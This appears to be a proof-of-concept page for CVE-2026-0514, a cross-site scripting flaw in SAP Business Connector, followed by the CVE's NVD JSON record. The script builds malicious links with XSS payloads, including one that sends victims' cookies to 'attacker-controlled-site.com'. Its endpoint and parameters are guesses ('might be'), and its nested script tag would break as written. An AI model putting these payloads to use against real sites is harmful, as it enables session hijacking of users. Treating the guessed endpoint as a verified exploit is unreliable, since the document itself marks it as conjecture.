CVE-2026-0514

<!-- CVE-2026-0514 PoC - XSS in SAP Business Connector --> <!-- Example malicious URL that could trigger the XSS vulnerability --> <script> // Simulated XSS payload for SAP Business Connector // This demonstrates how an attacker might craft a malicious link const maliciousPayload = '<script>alert("XSS - CVE-2026-0514")</script>'; const baseUrl = 'https://<sap-business-connector-host>/'; // Attack scenario: Craft a URL with XSS payload in a parameter // Common vulnerable parameters might be: id, name, page, redirect, url, etc. const vulnerableEndpoint = 'webclient/redirect'; const maliciousUrl = `${baseUrl}${vulnerableEndpoint}?url=${encodeURIComponent(maliciousPayload)}`; console.log('Malicious URL for social engineering:'); console.log(maliciousUrl); // Another common XSS vector const xssVector2 = '" onerror="alert(document.cookie)" "'; const maliciousUrl2 = `${baseUrl}${vulnerableEndpoint}?param=${encodeURIComponent(xssVector2)}`; console.log('\nAlternative XSS vector:'); console.log(maliciousUrl2); // When victim clicks the link, they will be redirected to attacker's site // The payload executes in the context of the vulnerable domain const redirectPayload = '<img src=x onerror="window.location=\'https://attacker-controlled-site.com/steal?cookie=\'+document.cookie">'; console.log('\nRedirect payload:'); console.log(redirectPayload); </script>

{"cve": {"id": "CVE-2026-0514", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:54.113", "lastModified": "2026-01-16T16:53:03.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Cross-Site Scripting (XSS) vulnerability in SAP Business Connector, an unauthenticated attacker could craft a malicious link. When an unsuspecting user clicks this link, the user may be redirected to a site controlled by the attacker. Successful exploitation could allow the attacker to access or modify information related to the webclient, impacting confidentiality and integrity, with no effect on availability."}, {"lang": "es", "value": "Debido a una vulnerabilidad de cross-site scripting (XSS) en SAP Business Connector, un atacante no autenticado podría crear un enlace malicioso. Cuando un usuario desprevenido hace clic en este enlace, el usuario podría ser redirigido a un sitio controlado por el atacante. La explotación exitosa podría permitir al atacante acceder o modificar información relacionada con el cliente web, lo que afectaría la confidencialidad y la integridad, sin efecto en la disponibilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:business_connector:4.8:*:*:*:*:*:*:*", "matchCriteriaId": "99F0C742-7E03-425D-BCFC-F4683843350F"}]}]}], "references": [{"url": "https://me.sap.com/notes/3666061", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}